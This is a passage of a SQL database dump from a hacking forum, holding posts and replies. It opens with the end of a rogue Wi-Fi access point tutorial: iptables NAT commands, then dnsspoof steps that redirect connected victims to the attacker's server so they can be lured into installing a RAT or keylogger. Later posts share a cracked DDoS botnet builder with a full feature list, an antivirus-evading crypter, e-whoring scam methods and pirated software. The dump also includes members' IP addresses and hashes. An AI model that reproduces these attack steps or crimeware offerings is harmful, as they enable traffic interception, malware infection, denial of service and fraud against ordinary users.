/proc/sys/net/ipv4/ip_forward \r\niptables --flush \r\niptables --table nat --flush \r\niptables --delete-chain \r\niptables --table nat --delete-chain \r\niptables --table nat --append POSTROUTING --out-interface $interface -j MASQUERADE \r\niptables -A INPUT -i [+] -j ACCEPT \r\niptables -A OUTPUT -o [+] -j ACCEPT \r\niptables --append FORWARD --in-interface at0 -j ACCEPT \r\niptables -t nat -A PREROUTING -p udp -j DNAT --to $gateway[/code]\r\n\r\nCongratulations!!! You have set up a fake access point with WORKING internet connection. Go ahead, give it a try using another computer and connect to your access point!\r\n\r\nSTEP FIVE: SCREWING WITH PEOPLE\r\n\r\nNow that our client(s) is connected to YOU, you can do whatever you want to them! One of my favorites is the use of DNS spoofing. While your clients are connected to you, you can redirect whatever website they visit to whatever website you want them to go. Or, even better, you can redirect them to your own web server on your computer that could convince them to download a RAT or keylogger.\r\n\r\nI will show you how to perform a simple DNS spoofing attack on your client. Create a file in your ROOT folder named spoof. Enter the following text into that file.\r\n\r\nCode:\r\n[code]192.168.2.129 *[/code]\r\n\r\nNow we initiate the DNS spoofing attack. This will redirect every website our client visits to YOU. So if you are running your own web server on your computer, they will be redirected to that web server. This is great for Java Applet attacks and other Social Engineering Toolkit stuff! Use the search option at the top of this website to find out more.\r\n\r\nCode:\r\n[code]dnsspoof -i at0 -f /root/spoof[/code]\r\n\r\nThere, now every website they will visit will be redirected back to your own web server! Note, if you want this attack to be more flexible, edit the spoof file you created earlier. \r\n192.168.2.129 is the IP address you want to redirect them to. The parameter after that is the website you want to be redirected. For example, if I want to redirect my client\'s requests for google.com to yahoo.com, I would enter the following in my spoof file.\r\n\r\nCode:\r\n[code]98.139.183.24 google.com[/code]\r\n\r\nHere, 98.139.183.24 is the IP address of yahoo.com. You can find the IP address of websites by pinging them in the terminal.\r\n\r\nCode:\r\n[code]ping yahoo.com[/code]\r\n\r\nThis is the end of my tutorial. I hope you found it informative, as well as a fresh new way of performing wireless attacks. There are myriad ways you can leverage this attack to perform all sorts of man-in-the-middle attacks, but I leave that up to you to research. I did the hard part for you, so now it\'s up to you to figure out the rest! Please say thanks!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '9e114faf9efd6a54885376b4b3dd8be7', '0', '0'); INSERT INTO mybb_posts VALUES('5929', '963', '5430', '17', 'RE: ??SIEGRIED\'S EWHORE METHOD ??', '0', '4', 'Triple H', '1350847655', 'Nice method thanks and the image link doesn\'t work.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b92bcdbcd3faad631faac424df21cef0', '0', '0'); INSERT INTO mybb_posts VALUES('5930', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '228', 'VirtualLegend', '1350848314', 'Can you make me a userbar for my upcoming group Marketers\nSize: Idk the size of a Userbar\nColour Scheme: Green\nRender/Image: Dollar image\nText: Marketers\nAnything else: Suprise me \n\nContact me on skype when ur done of when ur stuck', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'b8cce4acd7313a20c3276b3e8f151d06', '0', '0'); INSERT INTO mybb_posts VALUES('5931', '963', '5430', '17', 'RE: ??SIEGRIED\'S EWHORE METHOD ??', '0', '257', 'XxTREYZxX', '1350848603', 'thanks for the great share mate appreciate it :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '54e5c8f82b675cfec3c0a9f03a229950', '0', '0'); INSERT INTO mybb_posts VALUES('5932', '1028', '5928', '12', 'RE: [Tutorial] How to create a Fake Prank Wifi Access Point', '0', '257', 'XxTREYZxX', '1350848734', 'ahah thanks for the great share mate \ni love it :O', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '44e64d090a79ca56114c0a75976ba72d', '0', '0'); INSERT INTO mybb_posts VALUES('5933', '998', '5649', '12', 'RE: Port Scanning Tutorial', '0', '257', 'XxTREYZxX', '1350850750', 'thanks for the great share mate :O\nreally well designed', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'efb54083aa00dcb0f928651c6d1ecc8b', '0', '0'); INSERT INTO mybb_posts VALUES('5934', '1019', '5836', '3', 'RE: Do you like your new?', '0', '82', 'iTzIpod', '1350850766', 'ELite/Upgraded Award Icon is fucked up.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '51e7639361abf1aac1f7ec3b55ff9ccd', '0', '0'); INSERT INTO mybb_posts VALUES('5935', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1350850797', '/me saw t3h jok3r on Skype. But didn\'t say anything..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e38cbe9ee8a4f0598cfa64b2a959c2b4', '0', '0'); INSERT INTO mybb_posts VALUES('5936', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1350850827', 'Okay thank you VirtualLegend! :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '08482192d1261a5a91de2200dc8335bd', '0', '0'); INSERT INTO mybb_posts VALUES('5937', '1019', '5836', '3', 'RE: Do you like your new?', '0', '257', 'XxTREYZxX', '1350851182', 'Yeah the elite one does not work...so yeah.', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', 'eb0edb6d2ad20d7a35c5fad604d24632', '0', '0'); INSERT INTO mybb_posts VALUES('5938', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '257', 'XxTREYZxX', '1350851261', 'Thanks everyone for joining this site and being active :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '69c7addbd639bb4cadd38b097c70aa5c', '0', '0'); INSERT INTO mybb_posts VALUES('5939', '1018', '5892', '47', 'RE: giving away premium account', '0', '257', 'XxTREYZxX', '1350851522', '[quote=\'iTzIpod\' pid=\'5892\' dateline=\'1350835352\']\r\nI should get this account because I was one of the first 100 members on this site. #82\r\nAnd also, I have the most posts on LH and contributed A LOT to this forum.\r\nMost of my posts tend to be HQ and Grammar and Spelling Free.\r\nMOST.\r\nAnd also, I have referred about 10 or 15 members on this site. \r\nI am planning on referring more.\r\n\r\nI have probably the best Usergroup on LH.\r\nOr had...\r\nUnique!! :)\r\n[/quote]\r\n\r\npm\'ing you right now congrats mate', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '49d3e659e445b66b7390b6b696327d41', '0', '0'); INSERT INTO mybb_posts VALUES('5940', '1009', '5887', '74', 'RE: minecraft server setup tut', '0', '257', 'XxTREYZxX', '1350851832', '[quote=\'iTzIpod\' pid=\'5887\' dateline=\'1350834860\']\r\nMade a new Minecraft Server! :)\r\nThanks again.\r\n\r\nProbably the most HQ post you made so far in my opinion.\r\nOthers are just LQ or so.\r\n[/quote]\r\n\r\nThanks mate :O\r\nappreciated lol', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '0d92ad703e35f6006b734f61cb932a3e', '0', '0'); INSERT INTO mybb_posts VALUES('5941', '1026', '5869', '3', 'RE: 1000 THREADS !!!!', '0', '222', 'Exposé', '1350853095', 'Congrats everyone. Hope we can get some more hq members around here :) and grow', '66.87.31.245', '1113006069', '0', '0', '0', '0', '1', '57874a368a55d8318aaafa9173e55177', '0', '0'); INSERT INTO mybb_posts VALUES('5942', '197', '696', '56', 'RE: /me Thread', '0', '222', 'Exposé', '1350853244', '/me has to work until 9:30. KMN', '66.87.31.245', '1113006069', '0', '0', '0', '0', '1', 'e0c3d6ce3a5159d27847b66fb2f2b01a', '0', '0'); INSERT INTO mybb_posts VALUES('5943', '1019', '5836', '3', 'RE: Do you like your new?', '0', '222', 'Exposé', '1350853468', 'Love how itzipod has like every award...', '66.87.31.245', '1113006069', '0', '0', '0', '0', '1', '2a3c6968ab4c8ee1a1b084ad17ebf74b', '0', '0'); INSERT INTO mybb_posts VALUES('5944', '1019', '5836', '3', 'RE: Do you like your new?', '0', '62', 'R?????zo?', '1350853553', 'I have almost no awards :/\nbut I like the icon centered, looks awesome :D', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '4110c5acf8e1f32b33a0e9d9ec3a3809', '0', '0'); INSERT INTO mybb_posts VALUES('5945', '413', '1899', '29', 'RE: EARN $50/HOUR EASILY', '0', '228', 'VirtualLegend', '1350854570', 'Making money with a GPT site is the worst method on the internet.\r\n\r\nBut nice share', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '90b15a77c3c6e08cd23b8c50913ce120', '0', '0'); INSERT INTO mybb_posts VALUES('5946', '689', '3511', '19', '[Junk]Test', '0', '228', 'VirtualLegend', '1350855840', 'This thread has been junked.', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('5947', '1029', '0', '2', 'Testing new plugin v.1', '0', '1', 't3h jok3r', '1350856892', '[lock]http://facebook.com[/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f494118bb4d39ff10500a5bd2f670d56', '0', '0'); INSERT INTO mybb_posts VALUES('5948', '1030', '0', '2', 'Testing new plugin v.2', '0', '1', 't3h jok3r', '1350857082', '[lock]Hi there[/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '09646f7401b10571bd67670e7a3f7c3e', '0', '0'); INSERT INTO mybb_posts VALUES('5949', '1030', '5948', '2', 'RE: Testing new plugin v.2', '0', '3', '??????????¢™', '1350857254', 'I dont think it worked?', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', '85560512e35de7feab55963af1481c73', '0', '0'); INSERT INTO mybb_posts VALUES('5950', '1030', '5948', '2', 'RE: Testing new plugin v.2', '0', '1', 't3h jok3r', '1350857295', 'Still working on it. It\'s an old plugin.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'cfb6cf399c1da9cf18889bddb4081232', '0', '0'); INSERT INTO mybb_posts VALUES('5951', '1031', '0', '7', 'Testing new plugin public', '0', '1', 't3h jok3r', '1350857627', '[lock]Sup people[/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'c2a0b8c64d504ccc8cc96b191aa5c1da', '0', '0'); INSERT INTO mybb_posts VALUES('5952', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '228', 'VirtualLegend', '1350857733', 'What for plugin is it, and what does it do?', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '2f7b432e7fb5e541d94c246346365476', '0', '0'); INSERT INTO mybb_posts VALUES('5953', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '5', 'Timmy', '1350857831', 'You need to post to see the content.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '09b572e70f5a8bc7aa060f2199bf821e', '0', '0'); INSERT INTO mybb_posts VALUES('5954', '963', '5430', '17', 'RE: ??SIEGRIED\'S EWHORE METHOD ??', '0', '228', 'VirtualLegend', '1350857876', 'Thanks for the share bro', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'd78c7bb8d7c21386160d4c5903173920', '0', '0'); INSERT INTO mybb_posts VALUES('5958', '963', '5430', '17', 'RE: ??SIEGRIED\'S EWHORE METHOD ??', '0', '62', 'R?????zo?', '1350857998', 'you\'re all welcome bro, thanks for the feedback.\nEDIT: I can\'t fix the image.', '94.132.244.168', '1585771688', '1', '0', '62', '1350858016', '1', '62f16a055d7c9709200f291d5a7e1e3c', '0', '1350858016'); INSERT INTO mybb_posts VALUES('5956', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '4', 'Triple H', '1350857892', 'Posting posting posting posting', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'a2fb4b319cf98fc6604c241dd977b086', '0', '0'); INSERT INTO mybb_posts VALUES('5957', '1031', '5951', '7', 'RE: Testing new plugin public', '0', '62', 'R?????zo?', '1350857930', 'wow this is cool, I think we should have this really\nprevents people from leeching.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '9fb4c704103346a3cb68f927c74e2052', '0', '0'); INSERT INTO mybb_posts VALUES('5960', '1032', '0', '3', 'Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '1', 't3h jok3r', '1350859516', 'Thanks to everyone who helped L33T Hacking reach 1,000 threads today. \n\nMovie RIPs section is password protected, you need 40 posts in order to gain access to the forum. After you get 40 posts, PM any Staff member or any Admin.\n\nLogo has been resized and centered. The header links are also centered and the background behind the links will be removed soon. I might also add a background behind the logo.\n\nPost here and PM me has been BANNED! All new threads will now have to make their download links public. I have added a new plugin, you can/should use the following code while posting download links.\n\n[code]\n[lock]CONTENT HERE[/lock]\n[/code]\n\nDemo: http://l33thacking.net/thread-1031-lastpost.html\n\nThe editor message color is now white, you can easily see what you are typing.\n\nFrom now on you can now click on your username to visit your profile, the current color is green which makes it kinda hard to see because of the welcomeblock background. I\'m also working on it and trying to change the username link color.\n\nAwards have been added. Check out the Awards help document [url=http://l33thacking.net/misc.php?action=help&hid=12]here[/url]\n\nI have added a couple of new mycodes, you can check them out [url=http://l33thacking.net/misc.php?action=help&hid=7]here[/url]. Should be updated in the next 10 minutes. \n\nElite Award fixed!\n\nMarketplace will be added in [i]November[/i].\n\n[b]Milestones[/b]\n1. LH reached 1K threads\n2. Suggestions forum has 200 posts\n3. We have 50 tutorials in our hacking tutorials section.\n4. We have over 1K thousand PIDs in our warez section.\n5. R?????zo? has almost reached 400 posts. One post left.\n6. We now have 30 tutorials in our graphic tutorials section.\n7. I reached 900 posts', '72.231.24.165', '1223104677', '1', '0', '1', '1350860307', '1', '96e9bbbf6b2dc4998dfcf4f0ec90424f', '0', '1350860307'); INSERT INTO mybb_posts VALUES('5961', '1033', '0', '30', '[FREEInstagram Bot [Worth 47$]', '0', '62', 'R?????zo?', '1350859569', '[quote=\'***.\' pid=\'23704774\' dateline=\'1340215079\']\n[b][color=#FF1493]Ques: What is Instagram bot?[/color][/b]\n[b][color=#32CD32]Ans: Just go here [url=http://www.instagrambot.com/]HERE[/url][/color][/b]\n\n[b][color=#FFA500]Its worth 47$ but you\'ll get it for free.[/color][/b]\n\n[b][color=#FF1493]How to get it?[/color][/b]\n[b][color=#32CD32]Just post here and PM me[/color][/b][/quote]\n\nDownload: http://www.mediafire.com/?9t7j7b772p0ebyv\nVirus scan: https://www.virustotal.com/file/f62bd1060b41c785631be90f46e37fefc75d3e55abdbe6bdcd4bb187f657822c/analysis/1350147459/\n\n[img]http://img842.imageshack.us/img842/4117/4c439627c4294e4db56859c.png[/img]', '94.132.244.168', '1585771688', '1', '0', '62', '1350859631', '1', 'bcd5df39f0b7671064b78e0bad0c69d3', '0', '1350859631'); INSERT INTO mybb_posts VALUES('5962', '1034', '0', '81', '[Cracked] Dark DDoSeR 5.1', '0', '62', 'R?????zo?', '1350859705', 'Here I have Dark DDoSeR 5.1 Cracked by The Old Warrior run at your own risk\n\n[color=#FF0000]Client Features[/color]\n[spoiler]\n[-] Menu\n[+] Multi-Listen Socket Feature (Any Port)\n[+] Select # (Selects custom number of zombies)\n[+] Find IP (Locates and selects the IP in the listview)\n[+] Friends List (Keep yourself organized on who is truly your friend or foe)\n[+] DDoS History (Automatically keeps your victims saved)\n[+] Server Build (Create your server with personal settings)\n[++] Connect\n[+++] Host/DNS (DynDNS, no-ip, etc)\n[+++] Port (Chose any Port for server to connect)\n[+++] Reconnect Interval (sec)\n[+++] Registry Key (Startup)\n[+++] Registry Value (Startup)\n[+++] Mutex (Keep your server.exe from running again at the same time!)\n[+++] UPX Compression (Compress your .exe 60% smaller than normal size!)\n[++] Build\n[+++] Download server.exe\n[+] Options\n[++] Listview\n[+++] Change (.bmp) (Changes listview background to personal backgrounds)\n[+++] Remove (.bmp) (Choose to have no background in listview)\n[+++] Add/Remove Gridlines\n[+++] Color\n[++++] ForeColor (Change to custom color)\n[++++] BackColor (Change to custom color)\n[++] Form\n[+++] Theme\n[++++] Browse... (Change Theme of Client - Over 100 themes)\n[++++] Remove (Remove the theme - Compatible with Linux Wine)\n[+++] Text\n[++++] Font (Change to personal font)\n[++++] ForeColor (Change to custom color)\n[++++] BackColor (Change to custom color)\n\n[-] Commands\n[++] Show DNS (Show what DNS the server connects to)\n[++] DL/Execute (Download and execute a file on victim)\n[++] Update (Download and execute a file on victim, then uninstall)\n[++] Restart (Restart server - using temporary, auto-generated mutex)\n[++] Re-connect (Re-establishes connection with server)\n[++] Close (Exits process of server, does not remove registry)\n[++] Uninstall (Remove registry and disconnect server)\n\n[-] DDoS\n[+] Multi-threaded UDP Flood\n[+] SSYN Flood\n[+] HTTP Flood\n-> IP Address (Chose the host for attack)\n-> Port (Chose a custom Port)\n-> Type (Chose UDP or SSYN)\n-> Speed (Speed of attack)\n-> Size (Size of each Packet)\n-> Packets (Number of data sent)\n-> UDP Strength (Stable or Aggressive)\n-> Stop Timer (Automatically stop ddos after certain amount of seconds)\n-> Automatic Flood (floods in _ seconds, for _ seconds)\n-> Selected Only (Attack with only the selected zombies)\n--> Send Command (Start Attack)\n--> Stop Command (Stop Attack)\n\n[-] Statusbar (Located on bottom of client)\n[+] Status (Tells of lost connections, etc)\n[+] New Infections (Keeps track on # of new infections while client has been open)\n[+] Peak (Climax of zombies in listview)\n[+] Zombies Online\n[+] Time\n\n[-] Other\n[+] Works on all Windows (Including Vista, and Seven - Both 32 and 64 bit)\n[+] UAC Work-around (Won\'t prompt user - Registry -> Current User)\n[+] Stealth (Quietly runs on infected user\'s PC without prompt)\n[+] Ping Pong (Checks if the infected user is still responsive)\n[+] Instant Response (Infected users respond instantly)\n[+] Lifetime Membership and Updates!\n[+] Instant Access (As soon as you purchase, you will recieve access to Portal)\n[+] Membership to Portal (Change DNS, Serial, Password, etc)\n[+] ONLY $25!\n[+] Sleek GUI Change!\n[+] Cryptable **\n[+] Strong, Reliable DDOS\n[+] 37.5 KB Stub; When compressed = 19.5 KB\n[/spoiler]\n\n\n\n[color=#00BFFF]vScan:[/color][url=http://adfoc.us/7778111152521]vScan for all you NOOBS[/url]\n\n[color=#0000CD]Download:[/color] [url=http://adfoc.us/7778111152467]Say Thanks :)[/url]', '94.132.244.168', '1585771688', '1', '0', '62', '1350861646', '1', '8d2df7e092aab87f3c56d215a7647e23', '0', '1350861646'); INSERT INTO mybb_posts VALUES('5992', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '82', 'iTzIpod', '1350861668', 'Edit your other post from earlier with that userbar.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '3d54a21bd439e64e696a89d4491c267d', '0', '0'); INSERT INTO mybb_posts VALUES('5963', '1035', '0', '20', 'NEW | FREE | Aegis Crypter | 100%FUD | UPDATE[14/10/2012]', '0', '62', 'R?????zo?', '1350859841', '[img]http://sphotos-b.xx.fbcdn.net/hphotos-ash3/560769_128145394001192_22428087_n.jpg[/img]\nFeatures:\n\nFUD 100%\n\nRuntime All Windows (32 + 64 Bit)\n\nCompiled Visual Studio 2010 and Visual C++ 6.0\n\nContains Five Stub\nDownload Link:\n[url=http://aegiscrypter.googlecode.com/files/Aegis%20Crypter%20Bete0.1.zip]click here[/url]\n\nvirus scan-[url=http://virusscan.jotti.org/en/scanresult/fb601b1bff050912bffb25cc0d28d06430ad20b1]scan[/url]', '94.132.244.168', '1585771688', '1', '0', '62', '1350859855', '1', '5dfbdd7cf622270af1652eeb960ff2bd', '0', '1350859855'); INSERT INTO mybb_posts VALUES('5964', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '82', 'iTzIpod', '1350860271', 'Also, if you haven\'t noticed, you can easily bypass the \"lock\" plugin thingy.\n\nJust click on Quote and then you can see what\'s there.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '30000769a997a9506e4409c8930aad93', '0', '0'); INSERT INTO mybb_posts VALUES('5965', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '3', '??????????¢™', '1350860313', 'Nice now that fixes the problem for leechers a little bit.', '75.22.48.43', '1259745323', '1', '0', '0', '0', '1', 'fb39dcc3c5db430854dda1cb87680721', '0', '0'); INSERT INTO mybb_posts VALUES('5975', '1036', '0', '30', 'Mega SEO Pack', '0', '62', 'R?????zo?', '1350860809', 'If you want to see your site/forum on top, then here is the solution.\r\n\r\nThis pack includes...\r\n\r\nThe premium softwares with cracks+patches...\r\n\r\n[u][color=#006400][size=large][b]Download:[/b][/size][/color][/u]\r\n\r\nhttp://www.mediafire.com/?nm1o235up9ojbni', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '433f485502084a8eec5bf9687d1125dc', '0', '0'); INSERT INTO mybb_posts VALUES('5967', '1019', '5943', '3', 'RE: Do you like your new?', '0', '82', 'iTzIpod', '1350860469', '[quote=\'ƒ???????????g\' pid=\'5943\' dateline=\'1350853468\']\r\nLove how itzipod has like every award...\r\n[/quote]\r\n\r\nPssh. I would\'ve had more than this. But he forgot to give all of them to me.\r\n\r\nAlso, I\'m back to LH now.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9b308718a9a6c3826ad4dd4c6a91a7ae', '0', '0'); INSERT INTO mybb_posts VALUES('5968', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1350860508', '/me has a History Project due on November 8th and hasn\'t started yet.. Also, needs new shoes.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1657d1a5ff7bffc78f9487a8d6045ef1', '0', '0'); INSERT INTO mybb_posts VALUES('5969', '1032', '5964', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '1', 't3h jok3r', '1350860527', '[quote=\'iTzIpod\' pid=\'5964\' dateline=\'1350860271\']\r\nAlso, if you haven\'t noticed, you can easily bypass the \"lock\" plugin thingy.\r\n\r\nJust click on Quote and then you can see what\'s there.\r\n[/quote]\r\n\r\nI think you are talking of an older version of the plugin. I checked it out and it works perfectly, so maybe the bypass is of an older version.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'b0387c5bd72b3fe33412a5bb4252f2c4', '0', '0'); INSERT INTO mybb_posts VALUES('5970', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '82', 'iTzIpod', '1350860581', 'Oh okay. Nevermind.\n\nOT: Oh shit.\nMarketplace is coming back?\nI\'m gonna sell some stuff over there.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ccaa9f10d24e6b6ddf0761fb7505c2cb', '0', '0'); INSERT INTO mybb_posts VALUES('5971', '431', '5959', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '228', 'VirtualLegend', '1350860633', '[quote=\'R?????zo?\' pid=\'5959\' dateline=\'1350859125\']\r\n[quote=\'VirtualLegend\' pid=\'5930\' dateline=\'1350848314\']\r\nCan you make me a userbar for my upcoming group Marketers\r\nSize: Idk the size of a Userbar\r\nColour Scheme: Green\r\nRender/Image: Dollar image\r\nText: Marketers\r\nAnything else: Suprise me \r\n\r\nContact me on skype when ur done of when ur stuck\r\n[/quote]\r\n\r\nhad no idea what to make\r\nSo I made it like this:\r\n\r\n[img]http://i.imgur.com/ifvO7.gif[/img]\r\n\r\nHope you like it, pm\'ed you on skype too.\r\n[/quote]\r\n\r\nBro this awesome you sir have talent\r\n\r\n1000 times Thanks', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', '029aa5f75271d7657061e83addd56f87', '0', '0'); INSERT INTO mybb_posts VALUES('5972', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1350860673', 'Looks really good @Reloadzor :) Good job.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'cefb7762419bd2591f415d903b243ad0', '0', '0'); INSERT INTO mybb_posts VALUES('5973', '212', '849', '58', 'RE: Official New Groups Questions, Inquires, Policies and More', '0', '228', 'VirtualLegend', '1350860724', 'The new userbar created by Reload [img]http://i.imgur.com/ifvO7.gif[/img]', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'f2df129ff6d1ed95f4910304b7b5c5ef', '0', '0'); INSERT INTO mybb_posts VALUES('5974', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '62', 'R?????zo?', '1350860735', 'I think the \"You must post to unlock this link\" is a good idea, but it also blocks links on people signatures.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c80855a512c78c3183da212bc5b25cbb', '0', '0'); INSERT INTO mybb_posts VALUES('5976', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '228', 'VirtualLegend', '1350860861', 'LH is getting more advanced!!!\n\nHope will get a other great plugin', '83.83.167.183', '1397991351', '1', '0', '0', '0', '1', 'cfe0006f6454db61ef0f2498f17e5ab0', '0', '0'); INSERT INTO mybb_posts VALUES('5977', '1037', '0', '30', 'Empireviews Type 2 Bot', '0', '62', 'R?????zo?', '1350860869', 'Here\'s the New EmpireViews bot!, its sick!.\r\n\r\n[quote]- There no IE or other browser will show using this bot. I use WebRequest to surf link\r\n- U can also speed up gain point using this bot\r\n- screenshot[/quote]\r\n[img]http://i48.tinypic.com/bf49x4.jpg[/img]\r\n\r\nDownload.\r\n[spoiler] \r\nVirus scan: https://www.virustotal.com/file/945cc53fd49d2669cf98ead1d0f7fb919c5a2e71ad8104d7ede024598f6ea7d4/analysis/\r\nhttp://www.2shared.com/file/r7ExOSHj/empireviews.html\r\n[/spoiler]', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'f220fcf3964369e8d13e83c08c617ea8', '0', '0'); INSERT INTO mybb_posts VALUES('5978', '1037', '5977', '30', 'RE: Empireviews Type 2 Bot', '0', '100', '??zg???g????61', '1350861016', 'Ohh looks like a nice bot, thanks Reload ;D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '98404ef676de0cd67d03f2c81c86d6d8', '0', '0'); INSERT INTO mybb_posts VALUES('5979', '1038', '0', '17', 'Viral Adult Goldmine™ Combined E-whoring Method?', '0', '62', 'R?????zo?', '1350861034', '[align=center][img]http://i732.photobucket.com/albums/ww328/Firefury87/EMF/Final_part1.png[/img][/align]\r\n\r\nDownload: http://www.mediafire.com/download.php?upq4ykq0x4a8kxe', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'd85ea87d068321276e155fc36dc4fa76', '0', '0'); INSERT INTO mybb_posts VALUES('5980', '1037', '5977', '30', 'RE: Empireviews Type 2 Bot', '0', '257', 'XxTREYZxX', '1350861097', 'thanks for the great bot appreciated :)', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '4dfdbf842d000bda89851be9abb9c192', '0', '0'); INSERT INTO mybb_posts VALUES('5981', '1038', '5979', '17', 'RE: Viral Adult Goldmine™ Combined E-whoring Method?', '0', '257', 'XxTREYZxX', '1350861174', 'may i have it please thanks in advance', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '6f56717e583e6e1842425dc4ce7ab4f0', '0', '0'); INSERT INTO mybb_posts VALUES('5982', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '62', 'R?????zo?', '1350861223', 'Glad you like it :)\nAlways here to help.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '189807f9d0704c0cc33ae699e318298f', '0', '0'); INSERT INTO mybb_posts VALUES('5983', '1035', '5963', '20', 'RE: NEW | FREE | Aegis Crypter | 100%FUD | UPDATE[14/10/2012]', '0', '100', '??zg???g????61', '1350861232', ':O thanks a TON dude! Could you post proof of the %100 FUD? Thanks :D', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', 'a4a513073b9a90b996209f6d9c36efbc', '0', '0'); INSERT INTO mybb_posts VALUES('5984', '1039', '0', '61', 'Jump Start Your brain -Get easy A\'s in school + BOOST brain power,IMPROVE memory', '0', '62', 'R?????zo?', '1350861266', '[align=center][img]http://i.imgur.com/UVul3.png[/img]\r\n\r\n\r\nDownload: https://www.dropbox.com/s/anuimjhv8349c1z/Jump%20start%20the%20brain.%20%281%29.pdf[/align]', '94.132.244.168', '1585771688', '1', '0', '1', '1350861917', '1', '928d5db8bd946d7d681207c739441051', '0', '1350861917'); INSERT INTO mybb_posts VALUES('5985', '1033', '5961', '30', 'RE: [FREEInstagram Bot [Worth 47$]', '0', '100', '??zg???g????61', '1350861300', 'Lol dude post after post you are giving some HQ stuff :DD', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '712c2e99f7b32262d86aeb720ef7410c', '0', '0'); INSERT INTO mybb_posts VALUES('5986', '1040', '0', '61', 'How To Get Passes To Porn Sites', '0', '62', 'R?????zo?', '1350861351', 'Just check it out:\n\n[lock]http://www.mediafire.com/view/?b0fojy3s4iojzj1[/lock]', '94.132.244.168', '1585771688', '1', '0', '62', '1352550880', '1', '3d2ba0b5178a35ad06dca4e3a20a6ced', '0', '1352550880'); INSERT INTO mybb_posts VALUES('5987', '1034', '5962', '81', 'RE: [Cracked] Dark DDoSeR 5.1', '0', '100', '??zg???g????61', '1350861401', 'Thanks a ton man :D The Old Warrior is a great cracker.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '32cdae9f1c7741c6a3e5ae08d99be66d', '0', '0'); INSERT INTO mybb_posts VALUES('5988', '1038', '5979', '17', 'RE: Viral Adult Goldmine™ Combined E-whoring Method?', '0', '62', 'R?????zo?', '1350861450', 'The download link is on the thread.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '5f8f73b37ee2313801c486ccfb84e035', '0', '0'); INSERT INTO mybb_posts VALUES('5989', '1032', '5960', '3', 'RE: Updates for 10/21/12 - POST HERE PM ME BANNED!', '0', '257', 'XxTREYZxX', '1350861455', 'we are growing more and more every day but not sure about the:you must post to unlock this link.Its kinda confusing. Go LH', '203.104.11.43', '-882373845', '1', '0', '0', '0', '1', '4a25ad9d80555234f2233f1b87ae3d28', '0', '0'); INSERT INTO mybb_posts VALUES('5990', '1038', '5988', '17', 'RE: Viral Adult Goldmine™ Combined E-whoring Method?', '0', '257', 'XxTREYZxX', '1350861530', 